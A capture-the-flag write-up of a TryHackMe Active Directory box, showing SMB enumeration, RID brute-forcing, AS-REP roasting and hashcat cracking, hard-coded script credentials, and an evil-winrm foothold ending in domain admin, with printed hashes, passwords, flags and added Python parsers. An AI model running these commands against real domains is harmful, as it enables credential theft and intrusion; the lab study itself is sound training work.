Challenge
Write-up
Reconnaissance
Port scan
┌─[takuramy@parrot]─[~/Desktop/THM/Roasted]
└──╼ $nmap -A 10.145.158.101 -Pn
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-14 16:15 JST
Nmap scan report for 10.145.158.101
Host is up (0.24s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-04-14 07:15:35Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: WIN-2BO8M1OE1M1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2026-04-14T07:15:54
|_ start_date: N/A
|_clock-skew: -1s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.61 seconds
SMB looks suspicious.
SMB
Try listing the SMB shares anonymously.
$smbclient -L //10.145.158.101 -N
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
VulnNet-Business-Anonymous Disk VulnNet Business Sharing
VulnNet-Enterprise-Anonymous Disk VulnNet Enterprise Sharing
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.145.158.101 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Several shares were found, but only the following two could be entered anonymously:
$smbclient //10.145.158.101/vulnNet-Business-Anonymous -N
smb: \> ls
. D 0 Sat Mar 13 11:46:40 2021
.. D 0 Sat Mar 13 11:46:40 2021
Business-Manager.txt A 758 Fri Mar 12 10:24:34 2021
Business-Sections.txt A 654 Fri Mar 12 10:24:34 2021
Business-Tracking.txt A 471 Fri Mar 12 10:24:34 2021
8771839 blocks of size 4096. 4517773 blocks available
$smbclient //10.145.158.101/vulnNet-Enterprise-Anonymous -N
smb: \> ls
. D 0 Sat Mar 13 11:46:40 2021
.. D 0 Sat Mar 13 11:46:40 2021
Enterprise-Operations.txt A 467 Fri Mar 12 10:24:34 2021
Enterprise-Safety.txt A 503 Fri Mar 12 10:24:34 2021
Enterprise-Sync.txt A 496 Fri Mar 12 10:24:34 2021
8771839 blocks of size 4096. 4517729 blocks available
Information obtained from each share:
【vulnNet-Business-Anonymous】
- Business manager: Alexa Whitehat
- Business manager contact: 1337 0000 7331
- Contact for non-business proposals: Jack Goldenhand
【vulnNet-Enterprise-Anonymous】
- Security manager: Tony Skid
- Uses 128-bit SSL encryption and creates backups daily
- Infrastructure lead: Johnny Leet
- Sync manager contact: 7331 0000 1337
netexec
Use netexec (formerly crackmapexec) to enumerate users and groups by brute-forcing RIDs over SMB.
What is a RID?
It is part of the SID.
A Windows user's SID has the following form:
S-1-5-21-XXXXXXXX-XXXXXXXX-XXXXXXXX-500
The last number of the SID, 500 ← this is the RID (Relative ID).
Note: RID 500 is Administrator.
$netexec smb 10.145.158.101 -u guest -p '' --rid-brute
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 [*] Windows 10 / Server 2019 Build 17763 x64 (name:WIN-2BO8M1OE1M1) (domain:vulnnet-rst.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 [+] vulnnet-rst.local\guest:
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 498: VULNNET-RST\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 500: VULNNET-RST\Administrator (SidTypeUser)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 501: VULNNET-RST\Guest (SidTypeUser)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 502: VULNNET-RST\krbtgt (SidTypeUser)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 512: VULNNET-RST\Domain Admins (SidTypeGroup)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 513: VULNNET-RST\Domain Users (SidTypeGroup)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 514: VULNNET-RST\Domain Guests (SidTypeGroup)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 515: VULNNET-RST\Domain Computers (SidTypeGroup)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 516: VULNNET-RST\Domain Controllers (SidTypeGroup)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 517: VULNNET-RST\Cert Publishers (SidTypeAlias)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 518: VULNNET-RST\Schema Admins (SidTypeGroup)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 519: VULNNET-RST\Enterprise Admins (SidTypeGroup)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 520: VULNNET-RST\Group Policy Creator Owners (SidTypeGroup)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 521: VULNNET-RST\Read-only Domain Controllers (SidTypeGroup)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 522: VULNNET-RST\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 525: VULNNET-RST\Protected Users (SidTypeGroup)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 526: VULNNET-RST\Key Admins (SidTypeGroup)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 527: VULNNET-RST\Enterprise Key Admins (SidTypeGroup)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 553: VULNNET-RST\RAS and IAS Servers (SidTypeAlias)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 571: VULNNET-RST\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 572: VULNNET-RST\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 1000: VULNNET-RST\WIN-2BO8M1OE1M1$ (SidTypeUser)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 1101: VULNNET-RST\DnsAdmins (SidTypeAlias)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 1102: VULNNET-RST\DnsUpdateProxy (SidTypeGroup)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 1104: VULNNET-RST\enterprise-core-vn (SidTypeUser)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 1105: VULNNET-RST\a-whitehat (SidTypeUser)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 1109: VULNNET-RST\t-skid (SidTypeUser)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 1110: VULNNET-RST\j-goldenhand (SidTypeUser)
SMB 10.145.158.101 445 WIN-2BO8M1OE1M1 1111: VULNNET-RST\j-leet (SidTypeUser)
The command output confirms that the following users exist, so save them as a username list:
enterprise-core-vn
a-whitehat
t-skid
j-goldenhand
j-leet
administrator
guest
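An added example (not part of the original write-up) that parses netexec --rid-brute output into a user wordlist like the one above, flags well-known privileged RIDs, and splits a SID into its domain part and RID. The sample output, the EXAMPLE domain and the privileged-RID table are constructed for this example.

```python
import re
from collections import namedtuple

# Well-known RIDs of highly privileged principals (constructed reference table, not page output).
PRIVILEGED_RIDS = {500: "Administrator", 512: "Domain Admins",
                   518: "Schema Admins", 519: "Enterprise Admins"}

RidEntry = namedtuple("RidEntry", "rid domain name sid_type")

# Matches the tail of a netexec --rid-brute line: "1105: VULNNET-RST\a-whitehat (SidTypeUser)"
RID_LINE_RE = re.compile(
    r"(?P<rid>\d+): (?P<domain>[^\\]+)\\(?P<name>.+?) \((?P<type>SidType\w+)\)\s*$")


def split_sid(sid):
    """Split a SID string into (domain/issuer part, RID); the RID is the last sub-authority."""
    if not re.fullmatch(r"S-1-\d+(?:-\d+)+", sid):
        raise ValueError(f"not a SID: {sid!r}")
    prefix, rid = sid.rsplit("-", 1)
    return prefix, int(rid)


def parse_rid_brute(output):
    """Turn netexec --rid-brute output into RidEntry records; non-matching lines are skipped."""
    entries = []
    for line in output.splitlines():
        m = RID_LINE_RE.search(line)
        if m:
            entries.append(RidEntry(int(m["rid"]), m["domain"], m["name"], m["type"]))
    return entries


def user_wordlist(entries):
    """User accounts only: drop groups/aliases and machine accounts (names ending in '$')."""
    return [e.name for e in entries if e.sid_type == "SidTypeUser" and not e.name.endswith("$")]


def privileged_entries(entries):
    """Names whose RID is a well-known privileged RID, for a defender's review list."""
    return [(e.name, PRIVILEGED_RIDS[e.rid]) for e in entries if e.rid in PRIVILEGED_RIDS]


# Constructed sample with the same shape as the netexec output above (a subset of lines).
SAMPLE_OUTPUT = """\
SMB 10.0.0.1 445 DC01 [+] example.local\\guest:
SMB 10.0.0.1 445 DC01 500: EXAMPLE\\Administrator (SidTypeUser)
SMB 10.0.0.1 445 DC01 512: EXAMPLE\\Domain Admins (SidTypeGroup)
SMB 10.0.0.1 445 DC01 1000: EXAMPLE\\DC01$ (SidTypeUser)
SMB 10.0.0.1 445 DC01 1105: EXAMPLE\\a-whitehat (SidTypeUser)
"""
```

Feed it the full netexec output and `user_wordlist` gives the list to save as users.txt, while `privileged_entries` is the list a defender reviews first.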
Getting credentials
Use impacket-GetNPUsers to obtain hashes for users that do not require Kerberos pre-authentication (AS-REP roasting).
$impacket-GetNPUsers vulnnet-rst.local/ -no-pass -usersfile users.txt -dc-ip 10.145.158.101
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
/usr/share/doc/python3-impacket/examples/GetNPUsers.py:165: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[-] User enterprise-core-vn doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User a-whitehat doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$t-skid@VULNNET-RST.LOCAL:9d46582ea68caf591c39a5e4cbc2df77$1105a839ebff0fadfeb8d21fc32f91c8c6fecab76ee2b20b0315c4ba60954aa258f1309b9f4156421d6c0eee54a76a84845b7e3b964d256a352a910f390c170417d2ae43ac272180784e4d2bcb0fe3af3ab9871cc3d2a511416e5fdad4618171b2382be2ba259312ceee0836cd71e1d237b22cdfcc096dc904a7cdc9840f71c248b2d2b5138e6bbd77879f5a11f89c85fd7d1bf7936e2ae1575e12419ed1495c5dc1e3c6010f5fdec2a48b2867a1ae47031ec129cd3ffbc2a7c0e4c44f4fab22cfb891641097ce5a6bc32a63470a2ebb4c5f91d81229e5092b3517e65b97854e01955a18e42f3f575f72e606bfa4525ccf09c7b96381
[-] User j-goldenhand doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j-leet doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User guest doesn't have UF_DONT_REQUIRE_PREAUTH set
We obtained a hash for user t-skid, so pass it to hashcat to crack.
$hashcat t-skid-hash.txt /usr/share/wordlists/rockyou.txt
The command output yields the following credentials:
User: t-skid
Password: tj072889*
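An added example (not from the original write-up) that triages GetNPUsers output like the one above: it separates accounts that still require pre-authentication from those that leaked an AS-REP hash, splits the $krb5asrep$ line into its fields, and tests the userAccountControl bit a defender would clear to fix such an account. The sample output and its hex values are constructed.

```python
import re

# userAccountControl bit that impacket calls UF_DONT_REQUIRE_PREAUTH; accounts with it set leak an AS-REP hash.
UF_DONT_REQUIRE_PREAUTH = 0x400000

# hashcat-style AS-REP line: $krb5asrep$<etype>$<user>@<REALM>:<checksum hex>$<encrypted part hex>
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-fA-F]+)\$(?P<edata>[0-9a-fA-F]+)$")
SAFE_RE = re.compile(r"^\[-\] User (?P<user>\S+) doesn't have UF_DONT_REQUIRE_PREAUTH set$")


def parse_asrep_hash(line):
    """Split an AS-REP hash line into fields; for etype 23 (RC4-HMAC) the checksum must be 16 bytes."""
    m = ASREP_RE.match(line.strip())
    if not m:
        raise ValueError("not a $krb5asrep$ line")
    etype, checksum = int(m["etype"]), bytes.fromhex(m["checksum"])
    if etype == 23 and len(checksum) != 16:
        raise ValueError(f"etype 23 checksum should be 16 bytes, got {len(checksum)}")
    return {"user": m["user"], "realm": m["realm"], "etype": etype,
            "checksum": checksum, "edata": bytes.fromhex(m["edata"])}


def triage_getnpusers(output):
    """Sort GetNPUsers output into accounts that still require pre-auth and accounts that leaked a hash."""
    safe, roastable = [], {}
    for line in output.splitlines():
        m = SAFE_RE.match(line)
        if m:
            safe.append(m["user"])
        elif line.startswith("$krb5asrep$"):
            parsed = parse_asrep_hash(line)
            roastable[parsed["user"]] = parsed
    return safe, roastable


def preauth_disabled(user_account_control):
    """True when DONT_REQUIRE_PREAUTH is set in an account's userAccountControl value (the thing to fix)."""
    return bool(user_account_control & UF_DONT_REQUIRE_PREAUTH)


# Constructed sample in the shape of the output above; the hex here is made up, not a real AS-REP.
SAMPLE_OUTPUT = """\
[-] User a-whitehat doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$t-skid@EXAMPLE.LOCAL:00112233445566778899aabbccddeeff$deadbeef00112233445566778899aabbccddeeff
[-] User j-leet doesn't have UF_DONT_REQUIRE_PREAUTH set
"""
```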
Gaining access
SMB
Now that we have credentials, look at SMB again.
$smbclient //10.144.166.196/SYSVOL -U t-skid%tj072889*
$smbclient //10.144.166.196/NETLOGON -U t-skid%tj072889*
Compared with the anonymous logon, the difference is:
- NETLOGON
- SYSVOL
These two shares are now accessible.
【NETLOGON】
Found ResetPassword.vbs, with credentials hard-coded in it:
strUserNTName = "a-whitehat"
strPassword = "bNdKVkjv3RR9ht"
【SYSVOL】
Found ResetPassword.vbs here too.
It was the same as the one in NETLOGON.
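An added example (not from the original write-up) of the defender-side check this finding calls for: scanning scripts pulled from NETLOGON/SYSVOL for hard-coded credential assignments like the strPassword line above and reporting them with the value masked. The file names and contents are constructed.

```python
import re

# String literal assigned to a variable whose name suggests a secret, e.g. strPassword = "..."
# (VBScript form as in ResetPassword.vbs above; also catches Password=, pwd=, secret= spellings).
SECRET_ASSIGN_RE = re.compile(
    r'^\s*(?:Const\s+)?(?P<var>\w*(?:pass(?:word)?|pwd|secret)\w*)\s*=\s*"(?P<value>[^"]*)"',
    re.IGNORECASE)


def mask(value):
    """Keep only the first and last two characters so the report never re-exposes the secret."""
    if len(value) <= 4:
        return "*" * len(value)
    return value[:2] + "*" * (len(value) - 4) + value[-2:]


def scan_script(name, text):
    """Return (file, line number, variable, masked value) for each hard-coded secret in a script."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if stripped.startswith("'") or stripped.lower().startswith("rem "):
            continue  # VBScript comment lines are not live assignments
        m = SECRET_ASSIGN_RE.match(line)
        if m and m["value"]:
            findings.append((name, lineno, m["var"], mask(m["value"])))
    return findings


def scan_share(files):
    """files: mapping of path -> contents, e.g. everything pulled from NETLOGON and SYSVOL."""
    results = []
    for path, text in files.items():
        results.extend(scan_script(path, text))
    return results


# Constructed sample share contents; the password is a placeholder, not the one from the page.
SAMPLE_FILES = {
    "NETLOGON/ResetPassword.vbs": (
        'strUserNTName = "a-whitehat"\n'
        'strPassword = "Placeholder-Pa55!"\n'
        '\' strPassword = "old-commented-out"\n'
        "Set objUser = GetObject(strPath)\n"
    ),
    "SYSVOL/scripts/login.bat": "net use H: \\\\fileserver\\home\n",
}
```

Run `scan_share` over a mirror of the shares; anything it returns is a credential that every domain user can read and that should be rotated and removed from the script.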
evil-winrm
Want a shell, so try evil-winrm.
【t-skid】
This user cannot log in.
$evil-winrm -i 10.145.158.101 -u t-skid -p 'tj072889*'
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
【a-whitehat】
$evil-winrm -i 10.145.158.101 -u a-whitehat -p bNdKVkjv3RR9ht
*Evil-WinRM* PS C:\Users\a-whitehat\Documents>
Foothold obtained
user.txt
The challenge text says it is under Desktop, so looked there, but it was empty.
*Evil-WinRM* PS C:\Users\a-whitehat\Desktop> ls
*Evil-WinRM* PS C:\Users\a-whitehat\Desktop>
Looking under C:\Users, there were other users, and checking their directories turned it up.
*Evil-WinRM* PS C:\Users> type enterprise-core-vn\Desktop\user.txt
THM{726b7c0baaac1455d05c827b5561f4ed}
Checking privileges
Running whoami /groups shows several juicy privileges lying around.
*Evil-WinRM* PS C:\Users> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
================================================== ================ ============================================ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
VULNNET-RST\Domain Admins Group S-1-5-21-1589833671-435344116-4136949213-512 Mandatory group, Enabled by default, Enabled group
VULNNET-RST\Denied RODC Password Replication Group Alias S-1-5-21-1589833671-435344116-4136949213-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
| Item | Status |
|---|---|
| Local privileges | Administrator |
| Domain privileges | Domain Admins |
| Session | High Integrity |
The user we obtained belongs to the Domain Admins group and, combined with local administrator rights, has control over the entire domain.
system.txt
With the privileges in hand, go read system.txt.
As the challenge text suggests, system.txt is on Administrator's Desktop, but it cannot be read, apparently because the ACL (access control) still denies access.
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type system.txt
Access to the path 'C:\Users\Administrator\Desktop\system.txt' is denied.
At line:1 char:1
+ type system.txt
+ ~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (C:\Users\Admini...ktop\system.txt:String) [Get-Content], UnauthorizedAccessException
+ FullyQualifiedErrorId : GetContentReaderUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommand
But since we have the highest privileges, change the permissions.
- Change the owner
*Evil-WinRM* PS C:\Users\Administrator\Desktop> takeown /f system.txt
SUCCESS: The file (or folder): "C:\Users\Administrator\Desktop\system.txt" now owned by user "VULNNET-RST\a-whitehat".
- Grant permissions
*Evil-WinRM* PS C:\Users\Administrator\Desktop> icacls system.txt /grant Everyone:F
processed file: system.txt
Successfully processed 1 files; Failed processing 0 files
- Read it
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type system.txt
THM{16f45e3934293a57645f8d7bf71d8d4c}
Closing
I'm still not used to Windows hacking....
Permissions, authentication... I need to keep studying.
